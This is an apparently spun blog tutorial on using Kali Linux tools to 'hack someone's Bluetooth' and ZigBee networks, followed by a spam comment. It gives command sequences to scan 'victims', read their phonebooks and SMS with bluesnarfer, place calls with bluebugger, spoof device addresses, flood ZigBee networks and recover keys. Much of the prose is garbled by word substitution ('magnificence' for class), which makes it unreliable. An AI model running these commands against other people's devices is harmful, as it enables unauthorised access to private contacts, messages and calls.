Hack Someone’s Bluetooth And Other Wireless Tools Using Kali Linux


Blooover is performing the Bluebug attack(bluetooth sniffer linux). Whilst you intend to install the software, you have to be using a phone that has the Java Bluetooth API applied.


reading phonebooks
Writing phonebook entries
analyzing/deciphering SMS saved on the tool
placing call forward
starting up phone name
the way to Hack Bluetooth And other wi-fi tools using Kali Linux


Bluelog is a Linux Bluetooth scanner with optionally available daemon mode and internet front gives up, designed for website online surveys and visitors monitoring. It’s intended to be run for long intervals of time in a static place to determine what number of discoverable Bluetooth devices there are in the location.
Use the beneath command to peer the nearby Bluetooth device information in log report named btdevices.log

bluelog -i hci0 -o /root/Desktop/btdevices.log –v

Command provide Additional information including information of manufacturer, broadcast names and device class.

bluelog -i hci0 –mnc -o /root/Desktop/btdevices2.log –v

BlueMaho: Bluetooth Hacker App

BlueMaho is GUI-shell (interface) fo a collection of tools for testing security of Bluetooth gadgets. it’s miles freeware, open source, written in python, makes use of wxPyhon. it may be used for trying out BT-devices for known vulnerabilities and essential component to do – trying out to discover unknown vulns. additionally, it could shape pleasant records.
BlueMaho, an incorporated Bluetooth scanning/hacking device. right here we will simply use it for scanning. you can begin BlueMaho’s elegant GUI through typing:


 While you do, it opens a GUI. right here, I’ve clicked at the “get SDP data” and hit the play button to the left. BlueMaho begins scanning for discoverable gadgets, and like the different tools, it finds Bluetooth devices.
In the bottom window, BlueMaho shows greater data from the scanned devices. I have copied that information and located it right into a text file to make it less difficult so one can examine.
Be aware that it presentations the call of the first device after which describes the device type as “Audio/Video, Headset profile.” Then perceive 2nd device and we are advised its device type is “telephone, clever smartphone.”
Now, that we recognize how to gather facts on the Bluetooth devices in our range,


BlueRanger is an easy Bash script which uses hyperlink first-rate to locate Bluetooth tool radios. It sends l2cap (Bluetooth) pings to create a connection among Bluetooth interfaces, given that maximum devices allow pings without any authentication or authorization. The better the link high-quality, the nearer the device (in theory).
Use a Bluetooth magnificence 1 adapter for long variety area detection. switch to a class three adapter for a unique short variety finding. The precision and accuracy rely on the construct fine of the Bluetooth adapter, interference, and reaction from the far-flung device. Fluctuations may arise even when neither device is in motion.

Use the Bluetooth interface (hci1) to scan for the specified remote address (20:C9:D0:43:4B:D8):

root@kali:~# blueranger.sh hci1 20:C9:D0:43:4B:D8Bluesnarfer

 Bluesnarfer downloads the cellphone-e book of any mobile tool liable to Bluesnarfing. If an cell smartphone is susceptible, it’s far possible to hook up with the phone without alerting the owner, and advantage get entry to to restrained quantities of the saved facts.
Scan the remote device address (-b 20:C9:D0:43:4B:D8) and get the device info (-i):

root@kali:~# bluesnarfer -b 20:C9:D0:43:4B:D8 -i

Hack Mobile Bluetooth Using Bluesnarfer

Check The Configuration

hciconfig hci0

Scan for victims

hcitool scan hci0

Ping the vitcim device to see if device is awake

l2ping < Victim MAC Addr>

Browse the victim for rfcomm channels to connect to

sdptool browse –tree –l2cap < mac addr >

Then you can use bluesnarfer for example to read the victims phonebook, dial a number or read Sms or other things

Bluesnarfer -r 1-100 -C 7 -b < mac addr >

To see available opions to do

bluebugger -h

Dial number

bluebugger -m < victim name > -c 7 -a < mac addr > Dial < number >

 Btscanner :Hack Bluetooth In Kali Linux

Btscanner tool can seize records from a Bluetooth tool with out pairing. you can down load Btscanner the usage of this hyperlink. The setup could be very small is length (best 1.05 MB) and smooth to put in. Btscanner search devices and show them at the display and in case you want to look more info just hit input and it will show devices mac address.

1 Start your bluetooth with that command

Syntax:-service bluetooth start

2 Now open the btscanner with this command

Syntax:- btscanner

Now you are here
3 Now see the instructions which are given below in my case press i . and your scan is started
4.Now you find the bluetooth device list
5.Now select with the arrow keys and press enter and get full info about the bluetooth.


RedFang is a small proof-of-concept application to find non discoverable Bluetooth devices. This is done by brute forcing the last six (6) bytes of the Bluetooth address of the device and doing a read_remote_name().
Scan the given range (-r 00803789EE76-00803789EEff) and discover Bluetooth devices (-s):

root@kali:~# fang -r 00803789EE76-00803789EEff -s


Spooftooph is designed to automate spoofing or cloning Bluetooth device data. Spooftooph is designed to automate spoofing or cloning Bluetooth device name, elegance, and address. Cloning this data correctly lets in Bluetooth tool to cover in an undeniable website. Bluetooth scanning software will most effective listing one of the gadgets if multiple tools in range share the same device records when the devices are in Discoverable Mode (specifically the equal deal with).
Well, usually maximum folks never intend to audit the Bluetooth stack in any employer. however, this device might be exciting to apply in surroundings wherein Bluetooth gadgets were paired with crucial hardware.
Use the Bluetooth interface (-i hci1) to spoof itself as the given address (-a 00803789EE76):

root@kali:~# spooftooph -i hci1 -a 00803789EE76

Other Wireless Tools


Transmit a flood of associate requests to a target network.
zbassocflood [-pcDis] [-i devnumstring] [-p PAN ID] [-c channel] [-s per-packet delay/float]

zbassocflood -p 0xBAAD -c 11 -s 0.1

Decode plaintext key ZigBee delivery from a capture file. Will process libpcap or Daintree SNA capture files.
zbdsniff: Decode plaintext key ZigBee delivery from a capture file. Will process libpcap or Daintree SNA capture files
zbdsniff [capturefiles …]


A tcpdump-like tool for ZigBee/IEEE 802.15.4 networks
zbdump – a tcpdump-like tool for ZigBee/IEEE 802.15.4 networks Compatible with Wireshark 1.1.2 and later
zbdump [-fiwDch] [-f channel] [-w pcapfile] [-W daintreefile] [-i devnumstring]


zbfind provides a GTK-based GUI to the user which displays the results of a zbstumbler-like functionality. zbfind sends beacon requests as it cycles through channels and listens for a response, adding the response to a table as well as displaying signal strength on a gauge widget.


Search a binary file to identify the encryption key for a given SNA or libpcap IEEE 802.15.4 encrypted packet
zbgoodfind – search a binary file to identify the encryption key for a given SNA or libpcap IEEE 802.15.4 encrypted packet:
zbgoodfind [-frRFd] [-f binary file] [-r pcapfile] [-R daintreefile] [-F Don’t skip 2-byte FCS at end of each frame] [-d genenerate binary file (test mode)]


Replay ZigBee/802.15.4 network traffic from libpcap or Daintree files
zbreplay: replay ZigBee/802.15.4 network traffic from libpcap or Daintree files:
zbreplay [-rRfiDch] [-f channel] [-r pcapfile] [-R daintreefile] [-i devnumstring] [-s delay/float] [-c countpackets]


Transmit beacon request frames to the broadcast address while channel hopping to identify ZC/ZR devices.


  1. Woah! I’m really digging the template/theme of this blog.
    It’s simple, yet effective. A lot of times it’s very
    hard to get that “perfect balance” between user friendliness and visual
    appearance. I must say you’ve done a awesome job with this.
    Also, the blog loads extremely quick for me on Chrome.
    Exceptional Blog!


Please enter your comment!
Please enter your name here